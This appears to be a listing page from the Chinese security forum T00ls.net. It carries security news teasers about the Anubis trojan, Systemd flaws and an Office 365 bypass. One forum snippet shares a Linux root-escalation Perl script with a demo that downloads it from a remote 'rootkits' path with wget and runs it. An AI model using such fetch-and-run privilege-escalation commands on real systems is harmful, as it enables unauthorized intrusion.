Google Play 里的恶意应用利用手机运动传感器隐藏自己
趋势科技的研究人员报告了两个 Google Play 应用只在检测到手机移动时才会安装 Anubis 银行木马,Anubis 会利用按键记录器和屏幕截图的方式窃取用户的登录凭证。这两个应用其一是 BatterySaverMobi,安装量 5000 左右,另一个是 Currency Converter,安装量未知,Google 在收到报告之后已经将其移除。 ...
黑客可利用安全漏洞控制电动汽车充电站
据外媒报道,如果近日发现的施耐德电气EVlink Parking充电站漏洞被黑客利用,电动汽车车主将会无法给汽车充电。 据了解,目前多个国家的办公楼、酒店和超市附近均配备施耐德电气的EVlink Parking充电站。施耐德电气表示,各充电站的管理人员需要注意,如果当前充电站的固件版本是3.2.0-12_v1及之前的版本,建议充电站安 ...
Systemd 曝出三个漏洞 绝大部分 Linux 发行版易受攻击
Linux 系统与服务管理工具 Systemd 被曝存在 3 大漏洞,影响几乎所有 Linux 发行版。Systemd 是 Linux 系统的基本构建块,它提供了对系统和服务的管理功能,以 PID 1 运行并启动系统的其它部分。目前大部分 Linux 发行版都以 Systemd 取代了原有的 System V。安全公司 Qualys 近日发布报告称其发现 Systemd 中存在 3 个安全 ...
Imperva:2018 Web 应用漏洞数量比 2017 增加了 21%
Imperva 昨日发布了“ 2018 Web 应用漏洞现状”报告。数据显示,2018 年发现的 Web 应用新漏洞共 17,142 个,比 2017 年增加了 21% ,相比 2016 年增加了 159% 。其中有超过一半的漏洞可被黑客公开利用,有超过 1/3 的漏洞暂时还没有可用的解决方案。CMS 方面,WordPress 的漏洞数量持续增加。Drupal 虽然数量低于 WordPr ...
黑客使用零宽度空格绕过Office 365的保护
据外媒报道,微软最近修复了Office 365的一个漏洞,黑客之前利用这个漏洞绕过钓鱼保护,将恶意信息发送到受害者邮箱中。该漏洞与电子邮件原始HTML中的恶意URL中使用的零宽度空格(ZWSP)有关。黑客通过分割URL的方法,使得防御系统不能检测到恶意信息。 专家指出,使用这种技术可以绕过URL信誉检查和安全链接保护。由于这 ...
深度揭秘:美国电网存“后门” 俄罗斯黑客随意进出
据国外媒体报道,2017年3月的一天早上,迈克·维泰罗(Mike Vitello)的工作电话响了。客户想了解他们刚刚收到的一封奇怪电子邮件的更多信息。维泰罗想签的协议是什么?附件在哪里?维泰洛先生不知道他们在说什么。他工作的俄勒冈州建筑公司“全方位挖掘美国公司”( All-Ways Excavating US)进行了检查。他们告诉维特洛的 ...
1
2
3
4
5
6
7
8
9
10
linux 自动提权perl脚本
经常看到有人求linux各种版本的 exp 共享下国外发现的一个自动化脚本 (貌似 linux版块木有权限 就发这里得了) 地址 [url]http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt[/url] 使用demo[code]yaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.plyaseng@UAUC:~$ perl root.plyaseng@UAUC#:help----------- ...
贝因美(beingmate.com)某分站sql注入漏洞
根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询admin@t00ls.net!
T00ls.Net版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2018 T00ls.Net All Rights Reserved.苏ICP备16024049号